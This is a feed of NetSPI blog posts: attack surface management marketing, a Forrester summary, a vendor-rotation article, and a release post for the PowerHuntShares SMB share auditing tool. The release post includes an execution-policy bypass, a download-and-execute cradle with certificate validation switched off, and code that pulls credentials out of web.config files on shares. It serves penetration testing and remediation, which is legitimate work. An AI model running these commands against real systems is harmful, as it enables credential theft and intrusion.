While it’s possible to do, the spreadsheet approach involves considerable trial and error, extensive documentation reading, and inherent gaps. Consequently, this often leads the team to explore alternative solutions via third-party vendors, and oftentimes that involves cobbling together more than one solution. 

Challenges with Fragmented Technology for Managing the Attack Surface 

Security teams use a combination of third-party vendor technologies, such as security tools, inventory tools, cloud tools, and many more, paired with a spreadsheet or database to piece together the discovery and security of their attack surface. Each of these individual solutions provides valuable information and is an improvement from a spreadsheet approach, but they also come with some drawbacks and inefficiencies. Some common examples include: 

Security Tools 

Common security tools include vulnerability scanners and security rating tools. They are good for discovering and reporting on the vulnerabilities within the assets you tell them to scan. The challenge with relying on vulnerability scanners and security rating tools is that they only scan what they are told to scan, leaving unknown assets untested and potentially at risk. These solutions also have limited capabilities for noise reduction and contextualization, which leads to additional labor costs to validate and prioritize the findings they deliver. 

Inventory Tools 

Inventory tools and configuration management databases (CMDBs) are another common technology category used to help manage an organization’s attack surface. They focus on creating and maintaining a database of the company’s assets to assist with lifecycle management for IT teams. They are designed to track known assets and their IT configurations, not to find new assets or the vulnerabilities within them; as static tools built for IT teams, they leave out critical information that security teams need. 

Cloud Tools 

Cloud security posture management (CSPM) tools focus on cloud environments, ensuring that cloud resources are properly configured and compliant with desired standards. With the shift to the cloud, this is a key area many security teams focus on; however, the cloud is only a portion of an organization’s attack surface, leaving gaps in visibility.

While each of these tools is useful for its specific purpose, together they create fragmented information silos, error-prone processes, and the inefficiency of checking multiple systems for only part of the information needed. Security teams require a solution that provides real-time data, integrated workflows, and automated reporting on known and unknown assets throughout their environment. This often leads them to evaluate a true attack surface management (ASM) solution.

Gain Internal and External Attack Surface Visibility with NetSPI 

ASM solutions have grown exponentially in recent years. Forrester defines ASM as “solutions that continuously identify, assess, and manage the cybersecurity context of an entity’s IT asset estate.”  

Through the use of ASM, companies are able to identify and test known and unknown assets and vulnerabilities throughout their environment continuously, allowing them to stay on top of their security in between their point-in-time testing. This drastically reduces risk and improves operational efficiencies when paired with the correct ASM solution. However, not all ASM solutions are created equally.  

NetSPI External Attack Surface Management (EASM) delivers always-on external perimeter security, leveraging technology, processes, and human intelligence to uncover both known and unknown assets, while validating and prioritizing vulnerabilities. In addition, NetSPI Cyber Asset Attack Surface Management (CAASM) offers real-time visibility across users, applications, devices, and clouds, mapping and correlating assets within your technology stack to identify risks and coverage gaps. Together, these products deliver internal and external asset and risk visibility, always-on coverage, and deep data context to empower security teams. 

So, in summary, can you perform attack surface management on your own with open-source tooling? Yes. However, there will be additional challenges, inefficiencies, and costs.  

The best option is to work with a trusted ASM solution company like NetSPI, offering external and internal attack surface management solutions through NetSPI EASM and NetSPI CAASM. 

The post The Attack Surface is Changing – So Should Your Approach appeared first on NetSPI.

]]>
NetSPI’s Insights from Forrester’s Attack Surface Management Solutions Landscape, Q2 2024 https://www.netspi.com/blog/executive-blog/attack-surface-management/netspis-insights-from-forresters-attack-surface-management-solutions-landscape-q2-2024/ Thu, 21 Nov 2024 14:50:00 +0000 https://www.netspi.com/?p=26089 Read NetSPI’s perspective on key takeaways from Forrester’s The Attack Surface Management Solutions Landscape, Q2 2024.

The post NetSPI’s Insights from Forrester’s Attack Surface Management Solutions Landscape, Q2 2024 appeared first on NetSPI.

]]>
TL;DR

Forrester analyzed several attack surface management (ASM) vendors varying in size, type of offering, and use cases in its landscape report, The Attack Surface Management Solutions Landscape, Q2 2024. The NetSPI Platform was named by Forrester among notable vendors in the report for its Attack Surface Management solution.

The State of Attack Surface Management

ASM has grown exponentially over the last few years. Now a recognized market category, it equips businesses with crucial security strategies for comprehensive visibility into their attack surface. According to Forrester’s research, “ASM delivers insights on assets that ultimately support business objectives, keep the lights on, generate revenue, and delight customers.”  

NetSPI ASM allows you to inventory, contextualize, and prioritize assets and vulnerabilities on your internal and external attack surface with confidence and ease. Our ASM solution is backed by NetSPI’s team of dedicated security experts to help you discover, prioritize, and remediate security vulnerabilities of the highest importance, so you can protect what matters most to your business. 

Forrester on Choosing the Best ASM Solution

ASM is the first step in a proactive security program because it gives security teams a holistic view of your attack surface. Forrester defines ASM as “solutions that continuously identify, assess, and manage the cybersecurity context of an entity’s IT asset estate.” ASM allows your business to more clearly identify assets, establish and maintain the basics of a strong security system, and lay the groundwork for exposure management.  

Ideally, your ASM will offer both external attack surface management (EASM), which focuses on externally facing assets, and cyber asset attack surface management (CAASM), covering internally facing assets. This combination of EASM and CAASM provides both external and internal visibility to give you a complete picture of your assets. Additionally, the best ASM solutions will aid you in prioritizing risks specific to your business, guiding remediation steps, and integrating seamlessly into your environment. 

Opt For an All-In-One ASM Solution

When choosing an ASM partner, take into account the market dynamics in light of your current business challenges. Currently, the main market trend is ASM being delivered as part of a platform. This platform model gives security teams access to key proactive security solutions in a single technology. After all, no one likes switching programs to consolidate data.

In 2024, the ASM market’s top challenge is not the lack of visibility into the attack surface as you might expect, but the number of sources of visibility.

In 2024, the ASM market’s top challenge is not the lack of visibility into the attack surface as you might expect, but the number of sources of visibility. The information your security teams are looking to track is spread over too many sources, adding friction to gaining a comprehensive picture of the full attack surface.

A platform model addresses the challenge of technical debt by consolidating the security tech stack and optimizing the use of an ASM solution. This trend of consolidating solutions into a single platform will continue in the coming years as security teams face tighter budgets and look to get the most value out of their current investments. 

NetSPI integrated our cornerstone solutions on The NetSPI Platform to equip security teams with a single proactive security solution. ASM, penetration testing as a service (PTaaS), and breach and attack simulation (BAS) are all delivered through NetSPI’s Platform, putting users one step closer to continuous threat exposure management (CTEM).  

Enhance Attack Surface Visibility with NetSPI

In its report, Forrester noted:

“The future and value of ASM is bringing these capabilities into a single view, meaning ASM has evolved into an established market that:  

  • Relies less on external discovery and more on continuous posture evaluation.
  • Contains a growing number of suppliers with substantial category crossover.
  • Aggregates common discovery capabilities.”

The true value of ASM lies in its ability to deliver a real-time, always-on, comprehensive depiction of the complete attack surface.  

When used together, NetSPI EASM and NetSPI CAASM check all the boxes by delivering complete attack surface visibility, always-on coverage, and deep data context. NetSPI’s Platform can inventory both internal and external assets and vulnerabilities as they are added to your environment, eliminating manual discovery and maintaining an accurate list for you and your team.  

NetSPI’s always-on monitoring capabilities ensure your attack surface is protected around the clock. These real-time updates allow you to inventory assets and tackle vulnerabilities as they arise, significantly reducing risk. NetSPI’s Platform shows descriptions, severity, attack paths, blast radius, and more throughout your entire attack surface to implement informed decision-making, prioritization, and resource allocation.

The post NetSPI’s Insights from Forrester’s Attack Surface Management Solutions Landscape, Q2 2024 appeared first on NetSPI.

]]>
Hunting SMB Shares, Again! Charts, Graphs, Passwords & LLM Magic for PowerHuntShares 2.0 https://www.netspi.com/blog/technical-blog/network-pentesting/powerhuntshares-2-0-release/ Thu, 14 Nov 2024 21:42:48 +0000 https://www.netspi.com/?p=25956 Learn how to identify, understand, attack, and remediate SMB shares configured with excessive privilege in active directory environments with the help of new charts, graphs, and LLM capabilities.

The post Hunting SMB Shares, Again! Charts, Graphs, Passwords & LLM Magic for PowerHuntShares 2.0 appeared first on NetSPI.

]]>
Every hacker has a story about abusing SMB shares, but it’s an attack surface that cybersecurity teams still struggle to understand, manage, and defend. For the benefit of both attackers and defenders, I started an open-source GitHub project a few years ago called “PowerHuntShares”. It focuses on distilling data related to shares configured with excessive privileges to better understand their relationships and risk. A lot has happened in the industry since the tool’s creation, so the PowerHuntShares v2 release is focused on making incremental progress by exploring some additional analysis techniques to help cybersecurity teams and penetration testers better identify, understand, attack, and remediate SMB shares in their environments. For those interested in the previous PowerHuntShares release, here is the blog and presentation.

Let the pseudo-TLDR/release notes begin!

TLDR: New Functionality & Insights

  • Interesting File Discovery (~200)
  • Automated Secrets Extraction (50)
  • Share & Application Fingerprinting – LLM-Based & Static (80)
  • Asset Risk Scoring
  • Share Similarity Scoring
  • Peer Comparison Benchmark
  • Share Creation Timeline Chart
  • Remediation & Task Reduction Calculations
  • ShareGraph Explorer

TLDR: Basic Functionality

  • Updated tables to support sort, filter, and csv export
  • Added charts that support csv and image export options using ApexCharts.js
  • Basic style updates

This release is packed with new functionality and insights, so let’s dive in!

Running PowerHuntShares

I’ve provided more details on the GitHub page, but PowerHuntShares is a simple PowerShell script that can be downloaded and run using PowerShell 5.1 or greater on Windows systems. Below is a summary of how to get started.

1. Download PowerHuntShares here.

2. Bypass the PowerShell execution policy if needed.

# Bypass execution policy restrictions
Set-ExecutionPolicy -Scope Process Bypass

*Additional Options Here – https://www.netspi.com/blog/technical-blog/network-pentesting/15-ways-to-bypass-the-powershell-execution-policy/

3. Load PowerHuntShares in one of two ways:

a. Option 1: Open PowerShell and import the module.

# Import module from the current directory
Import-Module .\PowerHuntShares.psm1

b. Option 2: Open PowerShell and load it directly from the internet.

# Reduce SSL operating level to support connection to GitHub
[System.Net.ServicePointManager]::ServerCertificateValidationCallback ={$true}
[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12

# Download and load PowerHuntShares.psm1 into memory
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerHuntShares/main/PowerHuntShares.psm1")

4. Run PowerHuntShares from the PowerShell console. If you are already a domain user on a computer associated with the target Active Directory domain, you can just run it. If you are starting from a non-domain system, people typically run it using the process below.

a. Open cmd.exe and execute PowerShell or PowerShell ISE using the runas command so that network communication authenticates using a provided set of domain credentials.

# Launch a PowerShell session that authenticates to the network with the provided domain credentials
runas /netonly /user:domain\user PowerShell.exe

# Then, inside the new PowerShell window:
Set-ExecutionPolicy -Scope Process Bypass
Import-Module .\PowerHuntShares.psm1
Invoke-HuntSMBShares -Threads 20 -RunSpaceTimeOut 10 -OutputDirectory c:\folder\ -DomainController 10.1.1.1 -Username domain\user -Password password

Note: I’ve tried to provide time stamps and output during run-time, so you know what it’s doing.

After running, PowerHuntShares will output a new directory that contains an interactive HTML report, and a subdirectory named Results.

The Results directory houses csv files containing all the computer, share, file, and permission data collected, including things like excessive privileges and stored secret samples.
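Because everything lands in csv, it is easy to slice the raw results with a few lines of PowerShell. The file and column names below are placeholders for illustration; check your own Results directory for the exact names generated by your run.

# Placeholder file name and column name; substitute the csv produced by your run
$aces = Import-Csv -Path "C:\folder\Results\YourExcessivePrivilegesFile.csv"

# Example pivot: which share names carry the most excessive ACEs
$aces | Group-Object ShareName | Sort-Object Count -Descending | Select-Object -First 10 Name, Count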

The interactive HTML report attempts to consolidate and summarize the results. You can expect the report to look something like this. It feels like a web app, but it’s really just a bloated HTML file ;).

Alrighty, now they we’ve covered how to run the basic script, let’s dig into some of the v2 features.

Risk Scoring

“Be honest, how bad is it?”

Some environments have thousands of insecure share permissions that need to be fixed, so a little guidance for prioritizing remediation can go a long way. That’s why risk scoring was such an important thing to include in this release. I may cover the (super simple) math in more depth in another blog, but for now just know that the risk model is a simple formula that helps evaluate and rank risk based on the questions below:

  • Is the share name known to be remotely exploitable?
  • Is the share writable?
  • Is the share readable?
  • Does the share potentially contain sensitive data?
  • Does the share potentially contain stored secrets?
  • Has the share been modified in the last year?
  • Is it a default share?
  • Is the share empty?

Yep, that’s it. Super simple.

When the PowerHuntShares PowerShell script runs, it will automatically evaluate the risk of every excessive permission it finds and save it to a csv file for you. However, I also wanted to include some of those results in the HTML report. While every page in the HTML report has a chart related to risk, the dashboard includes a nifty little chart showing the total number of permissions that fall into each risk bucket. You can also click the buttons for more details.

By default, the bar chart only shows ACEs with excessive permissions, but you can click Networks, Computers, and Shares to see the number of affected assets for each risk level, as shown below.

In the example above, you can see that 13 critical risk permissions were found on 7 shares, hosted on 2 computers, on one subnet.

Similarity Scoring

“How similar are shares that have the same name, can I fix them all at once?”

In the first version of PowerHuntShares I attempted to help blue teams reduce the number of remediation tasks by grouping shares by their name. However, the reality is that just because shares have the same name doesn’t mean they’re the same. So, this round I wanted to find a more accurate way to measure and rank how similar groups of shares are based on some common criteria. I can cover the (very simple) math in another blog, but for your general knowledge, the similarity score is based on a formula that uses the following items to determine how similar a group of shares is:

  • Share Name
  • File Name (How many files of the same name exist in 10% or more of the shares in the group)
  • Folder Group Coverage (How many unique file listings exist)
  • Creation date to share name ratio
  • Last modified date to share name ratio
  • Owner to share name ratio
  • Folder group to share name ratio
  • Share descriptions to share name ratio

Now, you may be asking yourself, “Aren’t there cooler ways to measure similarity? Why didn’t I use a badass, well-known clustering algorithm for this?”. To that I would say, yes, that would be fun, but I’m using PowerShell to generate all of this and wanted to keep it “simple”. I was able to get the data into a cytoscape.js graph, but I didn’t have time to play with the algorithms for this release, maybe next round. 🙂 For now, you can find the similarity score in the “Share Names” section of the HTML report. As shown below, you can see the number of shares with the same name, their calculated similarity, the number of folder groups, files shared across shares, and more.
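
For those who want a feel for the math, a weighted average of those ratios is enough to reproduce the general idea. The weights and ratio names below are arbitrary examples, not the values PowerHuntShares actually uses.

# Illustrative only: similarity as a weighted average of 0-1 ratios for a group of shares with the same name
function Get-ShareGroupSimilarity {
    param([hashtable]$Ratios)  # e.g., @{ FolderGroup = 0.9; FileNameOverlap = 0.8; Owner = 1.0; CreationDate = 0.75 }

    $weights  = @{ FolderGroup = 3; FileNameOverlap = 2; Owner = 1; CreationDate = 1 }  # made-up weights
    $weighted = 0
    $total    = 0
    foreach ($key in $weights.Keys) {
        if ($Ratios.ContainsKey($key)) {
            $weighted += $Ratios[$key] * $weights[$key]
            $total    += $weights[$key]
        }
    }
    if ($total -eq 0) { return 0 }
    [math]::Round($weighted / $total, 2)
}

# Shares that mostly share folder groups, owners, and file names score close to 1
Get-ShareGroupSimilarity @{ FolderGroup = 0.9; FileNameOverlap = 0.8; Owner = 1.0; CreationDate = 0.75 }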

Expandable Sections

“Show me more!”

Several people said that it would be nice if they had the ability to drill down into the data found in the HTML report tables. You have been heard. On the “Share Names” page we saw in the last section, you can now drill down into every column of every row, and you can click any of the items below to expand.

Expanding each section reveals a lot more data for those interested in more context. That includes, but is not limited to, share application fingerprinting, creation/last modified dates, share owners, and even file listings.

Is it perfect? No. Is it a start in the right direction? Hopefully. 🙂

Peer Comparison Benchmark

“So, I have 1,000 critical risk configurations, really? Good to know, but how do I compare to my peers?”

I hear people say things like that a lot. Generally, I think some people want the option to say, “yeah, we’re not great, but neither is anyone else”. Regardless of whether I think that is a valid or healthy narrative, I’ve distilled a lot of data to identify rough averages for the percentage of computers, shares, and permissions (ACEs) affected by excessive SMB share permissions that we’ve observed in the past. The numbers are not perfect and will suffer from data drift, but my hope is they will give people a rough idea of how they compare to “normal”. Below is a look at the peer comparison chart on the HTML report dashboard.

Remediation Task Reduction Calculations

“Wait, I can fix 10 things instead of 1,000? Tell me how that works!”

Naturally, grouping shares by folder group, share name, or similarity score and remediating each group at once can dramatically reduce the time it will take to clean up your environment. In some cases, we’ve seen up to a 90% reduction in remediation tasks. The remediation section of the dashboard now includes a summary and chart showing the benefits of those approaches.
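
The underlying arithmetic is nothing fancy; it boils down to comparing the number of groups you would remediate against the number of individual shares or ACEs. Below is a quick sketch, where the csv path and ShareName column are placeholders rather than the tool's exact output names.

# Placeholder path and column name; substitute your own Results csv
$shares = Import-Csv -Path "C:\folder\Results\YourShareInventoryFile.csv"

$totalTasks   = $shares.Count
$groupedTasks = ($shares | Group-Object ShareName).Count
$reduction    = [math]::Round((1 - ($groupedTasks / $totalTasks)) * 100, 1)

"Remediating by share name: $groupedTasks tasks instead of $totalTasks ($($reduction)% fewer)"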

Share Creation Timeline Chart

“When did all this happen, how long have we had this exposure?”

That’s another question I’ve heard from clients. The Share Creation Timeline is my second attempt to illustrate the story of offending share creation and how long high and critical risk configurations have been in the environment. This round I also added a line to show where the average is and attempted to identify abnormal spikes in share creation using standard deviation. I’ve found it helpful for storytelling. However, if you want to play with the time series data on your own, PowerHuntShares automatically saves the creation, last accessed, and last modified dates to the csv output files.

As a quick note, I used apexcharts.js for this timeline chart.

Share Fingerprinting

“I have no memory of this place.”

It is common for clients to have no idea what their shares are used for. In most companies there usually isn’t a person who knows the activities of every business unit. So having ways to generate additional context is useful for blue teams (and pentesters). To help with that, I added a couple of methods for guessing the application context using static lists and, optionally, the almighty Large Language Model (LLM).

Static Share Fingerprinting Library

I did a little research on common applications and the shares they create. Out of that research, I created an initial library of about 80 applications and the associated share names. This fingerprint method always runs automatically. Accuracy is OK, coming in somewhere around 70%.
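
Conceptually, the static method is just a lookup table keyed on share name. The handful of mappings below are examples to show the shape of the idea, not the actual library contents.

# Illustrative only: a tiny share-name-to-application lookup (the real library covers ~80 applications)
$shareFingerprints = @{
    'netlogon' = 'Active Directory Domain Services'
    'sysvol'   = 'Active Directory Domain Services'
    'sccm'     = 'Microsoft Configuration Manager'
    'wsus'     = 'Windows Server Update Services'
}

function Get-StaticShareApp {
    param([string]$ShareName)
    # PowerShell hashtable keys are case-insensitive, so 'SCCM' and 'sccm' both match
    if ($shareFingerprints.ContainsKey($ShareName)) { $shareFingerprints[$ShareName] } else { 'Unknown' }
}

Get-StaticShareApp -ShareName 'sccm'   # Microsoft Configuration Manager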

LLM-Based Share Fingerprinting

Who wants to put AI in everything? Me, apparently. Guessing what applications are associated with share names alone can be tricky. I wanted a better way to identify potentially related applications using both the share name and the file listings. It turns out that a little bit of LLM prompt-foo can go a long way here. Accuracy is a little higher with this method, coming in around 80%.

For this first round, I decided to use Azure OpenAI Studio to spin up GPT 4o and GPT 4o mini endpoints. Thanks to Karl Fosaaen and Nick Stang, I’ve become a big fan. It was easy to set up and get rolling in no time. I’m not going to cover setup of the Azure endpoints in this blog, but I will say that once you have it set up, all you’ll need to get started with the new PowerHuntShares functionality is the API key and endpoint.

Below is a sample command, but please remember this has only been tested with the configuration above. No fine tuning was done, and no RAGs were used.

Invoke-HuntSMBShares -OutputDirectory C:\temp\ -ApiKey "[YourApiKey]" -Endpoint "https://yourendpoint.openai.azure.com/openai/deployments/yourendpoint/chat/completions?api-version=[configuredversion]"

For those that want to play with share application fingerprinting without PowerHuntShares, I’ve also created a couple standalone functions here. Below are a few sample commands to give you a vibe for the options.

# Simple output from text query

Invoke-LLMRequest -SimpleOutput -apikey "your_api_key" -endpoint "https://[yourapiname].openai.azure.com/openai/deployments/[yourapiname]/chat/completions?api-version=[configuredversion]" -text "What is 2+2?"

# Simple output from text query with image upload

Invoke-LLMRequest -SimpleOutput -apikey "your_api_key" -endpoint "https://[yourapiname].openai.azure.com/openai/deployments/[yourapiname]/chat/completions?api-version=[configuredversion]" -text "What is this an image of?" -ImagePath "c:\temp\apple.png"

# Full output with all response meta data

Invoke-LLMRequest -apikey "your_api_key" -endpoint "https://[yourapiname].openai.azure.com/openai/deployments/[yourapiname]/chat/completions?api-version=[configuredversion]" -text "What is 2+2?"

# Name from Command Line

Invoke-FingerprintShare -verbose  -ShareName "sccm" -FileList "variables.dat" -APIKEY "your_api_key" -Endpoint "https://[yourapiname].openai.azure.com/openai/deployments/[yourapiname]/chat/completions?api-version=[configuredversion]"

# CSV Import

Invoke-FingerprintShare -MakeLog -verbose  -OutputFile 'c:\temp\testouput.csv' -FilePath "c:\temp\testinput.csv" -APIKEY "your_api_key" -Endpoint "https://[yourapiname].openai.azure.com/openai/deployments/[yourapiname]/chat/completions?api-version=[configuredversion]"

# Data Table Import

Invoke-FingerprintShare -verbose -DataTable $exampleTable -APIKEY "your_api_key" -Endpoint "https://[yourapiname].openai.azure.com/openai/deployments/[yourapiname]/chat/completions?api-version=[configuredversion]"

# Name from Command Line, CSV Import, and Data Table Import

Invoke-FingerprintShare -Verbose  -OutputFile 'c:\temp\testouput.csv' -FilePath "c:\temp\testinput.csv" -ShareName "sccm" -FileList "variables.dat" -DataTable $exampleTable -APIKEY "your_api_key" -Endpoint "https://[yourapiname].openai.azure.com/openai/deployments/[yourapiname]/chat/completions?api-version=[configuredversion]"

If you do end up using PowerHuntShares with the LLM option, it will generate additional csv files that include your results, and you can browse summary data in the interactive HTML report. The dashboard also includes an asset exposure summary. All the application related data is generated from the LLM requests. If you do not opt-in to use the LLM capabilities, this section simply won’t include the application related information.

If LLM capabilities are used, you’ll also be able to see the static and LLM application guess when expanding Share names on the “Share Names” page.

Finally, the guessed applications will be included in the folder group page to help provide additional context. As shown below, if the shares/files can’t be associated with an application, the “related app” section will be left blank or “unknown”.

There is a lot more work to do in this space related to performance, accuracy, and benchmarking, but that will have to be something I revisit in future blogs and releases.

Share Graph

“Can you help me visualize some of these share relationships?”

I’ve only heard that a few times from clients, but I wanted an excuse to play with graph visualization, so here we are. This round I used cytoscape.js to help convert share data into nodes and edges that we can explore in the HTML report. This is still very experimental, but it does support the basic feature below:

  • Search
    • Keyword match
    • Shortest Path
    • Blast Radius
    • Save Image
  • Filter
    • Filter out object types
  • Layout
    • Hide/Show labels
    • Change layout using preset algorithms
    • Zoom in/out
    • Reset
    • Show all nodes
  • Canvas (right-click nodes)
    • Center
    • Select
    • Expand
    • View
    • Hide
    • Show

I’ll wait to get feedback from folks before spending too much more time fixing bugs or building out new features. Below is a quick sample screenshot.

As I mentioned before, Cytoscape.js also supports a variety of super fun algorithms that can be used for a number of use cases, so hopefully I will get some time to explore their utility in the next release.

Interesting File Discovery

“Excessive privileges are bad, but what data is actually exposed?”

That is a common question from attackers and defenders alike. There are a lot of tools out there that can help with this, but a few people asked if I could roll some of that basic functionality into PowerHuntShares. I did a little research and came up with about 200 file types/keywords and mapped them to 7 file categories related to data exposure and remote code execution opportunities. Hopefully the functionality will help people better understand where there may be risk of password exposure, data exposure, or command execution. Those categories include:

  • Sensitive
  • Secret
  • SystemImage
  • Database
  • Backup
  • Script
  • Binaries
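
To show the general idea, here is a heavily trimmed sketch of keyword-to-category matching. Which extensions belong to which category below are my own examples for illustration, not the tool's actual 200-entry mapping.

# Illustrative only: a small sample of extension/keyword patterns per category
$interestingFilePatterns = @{
    Secret   = @('*.pfx', '*unattend.xml', '*web.config')
    Database = @('*.mdf', '*.sqlite', '*.sql')
    Backup   = @('*.bak', '*backup*')
    Script   = @('*.ps1', '*.bat', '*.vbs')
}

function Get-InterestingFileCategory {
    param([string]$FileName)
    foreach ($category in $interestingFilePatterns.Keys) {
        foreach ($pattern in $interestingFilePatterns[$category]) {
            if ($FileName -like $pattern) { return $category }
        }
    }
    'Uncategorized'
}

Get-InterestingFileCategory 'web.config'   # Secret (based on the sample mapping above)
Get-InterestingFileCategory 'hr_data.bak'  # Backup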

I realize that people may have their own categories and lists of target files/extensions, so I also added a feature to allow you to import those at runtime. You can download the template file here, and then use it to search for things you care about using the command below.

Invoke-HuntSMBShares -OutputDirectory 'c:\temp' -DomainController 'dc1.domain.com' -Username 'domain.com\user' -Password 'YourPassword' -FileKeywordsPath "C:\temp\interesting-files-template.csv"

Either way, PowerHuntShares will save your output to the csv and show your categories in the interactive HTML report. Below is a sample screenshot of the summary chart found on the dashboard page.

There is also a dedicated Interesting Files page that allows you to search, filter, dig into, and export UNC paths for files you may care about.

Secrets Extraction from Configuration Files

“Cool, I like the interesting files thing, but could you parse the passwords for me?”

I’ve heard this a lot from the pentest test team. I also researched common configuration files and wrote 50 configuration file parsers that can extract credentials of various types. They are all run automatically. For example, if the scanner finds a web.config file, it will extract the username, password, and other relevant bits from the file, save them to csv, and include them in the interactive HTML report shown below.

Just like the other tables, you can search, filter, sort, and export the list of target files. Also, as a bonus I have released the individual configuration parsers as standalone PowerShell scripts along with sample configuration files.
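
For a rough sense of what that parsing involves, below is a minimal, standalone example of pulling credentials out of a web.config connection string. The UNC path is a placeholder, and the real parsers in the repository handle more file formats and edge cases than this sketch does.

# Placeholder UNC path; point this at a web.config you are authorized to review
[xml]$config = Get-Content -Path "\\server\share\web.config" -Raw

foreach ($cs in $config.configuration.connectionStrings.add) {
    # Pull user and password values out of a typical SQL-style connection string
    if ($cs.connectionString -match 'User ID=(?<user>[^;]+);.*Password=(?<pass>[^;]+)') {
        [pscustomobject]@{
            Name     = $cs.name
            Username = $Matches['user']
            Password = $Matches['pass']
        }
    }
}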

Considering I wrote 50 new parsers, my guess is that there will be edge cases that I haven’t considered. So, if you find a bug, please submit an issue or pull request to the GitHub project. If you’re not code savvy, also feel free to reach out to me on Twitter/X.

While you’re surfing GitHub for more open-source projects in this space, I also recommend checking out SMBeagle, Snaffler, Nemesis, and of course the original Find-InterestingFile function from PowerSploit.

Mini Video Walkthrough

Below is a quick video walk through of the new updates in the PowerHuntShares v2 release.

Wrapping Up

This is still the beginning of exploring how we can better identify, understand, attack, and remediate SMB shares in Active Directory environments at scale. There are many features and fixes I would like to apply to PowerHuntShares as time goes on, but in the meantime, I hope this release helps open some new doors for people.

Happy hunting and don’t forget to hack responsibly! 😊

The post Hunting SMB Shares, Again! Charts, Graphs, Passwords & LLM Magic for PowerHuntShares 2.0 appeared first on NetSPI.

]]>
Why Changing Pentesting Companies Could Be Your Best Move https://www.netspi.com/blog/executive-blog/penetration-testing-as-a-service/why-changing-pentesting-companies-could-be-your-best-move/ Tue, 12 Nov 2024 14:39:37 +0000 https://www.netspi.com/?p=25940 Explore strategic decisions on changing pentesting companies. Balance risk, compliance, and security goals with an effective pentesting partner.

The post Why Changing Pentesting Companies Could Be Your Best Move appeared first on NetSPI.

]]>
TL;DR
  • Changing pentesting vendors may be essential if your current provider lacks vigilance or repeatedly fails to identify security vulnerabilities. Getting a second opinion on pentesting is always a good idea.
  • An effective pentesting partnership delivers efficiency gains through comprehensive program-level insights, offering a profound understanding of your systems and the risks that are most relevant to your company.
  • Exercise diligence in your pentesting vendor selection and don’t settle for the status quo if the findings you’re getting aren’t vetted by security experts, prioritized based on your business context, and delivered with step-by-step remediation guidance.

Introduction

A common challenge we hear from customers is that they’re required to rotate pentesting companies periodically. Whether it’s to comply with regulations, or to meet industry best practices, changing pentesting companies is a project that can introduce risk to the performance of your pentesting program if done too quickly.

At NetSPI, we’ve worked with many customers who are facing the decision of whether to rotate away from their current pentesting company. Switching pentesting vendors is a critical decision that’s often driven by regulatory compliance or the need to uphold the highest security standards. We compiled our insights to guide you through this transition and keep your pentesting program running smoothly.

We’ll explore signs that indicate it’s time to change vendors, key considerations for comparing pentesting companies, and the advantages of forming a robust partnership with a skilled team of security experts.

Saying “Goodbye” is the Hardest Part… Signs You Should Change Pentesting Companies

We’ll start by saying that getting a second opinion on pentesting is always a best practice. It’s typical for our customers, especially larger ones, to benchmark NetSPI against other pentesting companies to compare the quality of findings. We call this a bakeoff, and even though there’s no baking involved, it gives us a chance to show NetSPI’s high standard of performance, which is the sweetest treat of all.

Getting a second opinion on pentesting is always a best practice.

We also need to touch on situations when rotating your pentesting vendor is mandated by law for compliance. For companies in highly regulated industries, such as finance and healthcare, it’s common to face mandatory vendor rotation periodically.

This is actually a good thing!

Back to our first point, getting a second opinion is always helpful. The biggest risk to the quality of pentesting is the team becoming complacent and accidentally overlooking findings that a fresh set of eyes can see. Remember, threat actors aren’t limited by scope, so having a pentesting team that brings creativity to their approach will make your security better in the end.

In some cases, pentesting vendors, including NetSPI, can navigate the requirement to rotate pentesting companies by offering a completely unique team within the company, even in a different country, if needed. This creativity can allow our customers to bypass the administrative aspects of new vendor onboarding, while complying with the mandate to rotate pentesting teams.

Lastly, if you sense a tone of complacency, or you feel the findings your pentesting vendor delivers only meet the status quo, then it’s a good time to consider a bakeoff.

At NetSPI, we methodically train our security consultants to be highly thorough in their tests, and we see this pay off time and time again when customers thank us for presenting a critical finding that another team missed. If you feel it’s time for change, you may be surprised by the insights that a new perspective can bring to your pentesting program.

Criteria to Consider when Comparing Pentesting Companies

Let’s assume you’ve made the decision to change pentesting companies. The next step is to prepare your criteria for evaluating new partners. Taking the time to think critically at this step is crucial because your criteria will shape the overall success of your pentesting program.

When researching penetration testing firms, consider these qualities to ensure the best fit: 

  1. Quality and Expertise: Look into the vendor’s track record and the level of expertise their team brings. High-quality service and knowledgeable support can significantly impact the success of your project.
  2. A Platform with Historical Account Information: Consider whether the vendor’s solution offers comprehensive access to historical account data. This can be a game-changer for making informed decisions, tracking progress over time, and sharing your security stance visually with broader teams.
  3. Onboarding, Account Access, and Administrative Aspects: Assess the ease of onboarding, the simplicity of accessing accounts, and the overall efficiency of administrative processes. Smooth operations in these areas contribute to a better user experience from the start. Trust us; that’s why we have an entire team devoted to customer onboarding and project management.
  4. Security of Systems: Evaluate the potential vendor’s security measures to protect sensitive data. At the end of the day, your pentesting vendor is another company in your supply chain, and ensuring their data security protocols meet or exceed standards like the General Data Protection Regulation (GDPR) is essential.

Remember that your criteria are not limited to this list. However, it serves as a solid foundation for evaluating potential pentesting companies.


So, What Does a Quality Pentesting Partnership Look Like?

We have five words to summarize what a strong pentesting partnership looks like: efficiency gains through program-level knowledge.

In other words, when you have a strong partnership with a high-quality pentesting partner, the outcomes of your engagements will be more valuable to your security.


A few factors to consider:

Familiarity with the Environment

The more familiar a pentesting team is with your environment, the quicker they’re able to bring value to engagements. Reduced setup, preexisting familiarity with your systems, and added business context all contribute to knowing what’s actually important to you. This type of familiarity is only gained through long-term partnerships.

Central Platform for Historical Data

A modern approach to pentesting includes a central platform that brings visibility and prioritization to assets, vulnerabilities, and exposures. If your partnership offers a solution in addition to the pentesting team’s expertise, then it opens the door to providing deeper findings, a.k.a., the kind of info the C-suite cares about.  

A platform approach enables pentesters to view historical testing data, collective insights from different testing types, and a visualization of the actual path an adversary could take to gain access to identified assets. 

A strong pentesting partnership will consistently bring value to your overall security program. Gone are the days of siloed, point-in-time testing. Having a pentesting provider that can offer complementary solutions, such as attack surface management (ASM) with 24/7/365 visibility, enhances your security with a risk-based approach tailored to your business.

Ready for a Second Opinion on Pentesting?

Changing pentesting vendors can seem like a major undertaking, but it’s often necessary for compliance, improved security, and better results. The best pentesting partnerships combine a thorough understanding of your environment, access to historical data for informed decisions, and a team that brings a fresh, innovative approach to security. With these elements in place, the value and efficiency of your pentesting program can be significantly enhanced.

If you’re considering whether it’s time for a change, remember that a new perspective from a trusted, competent partner could be exactly what your security program needs. Contact NetSPI for a consultation today.

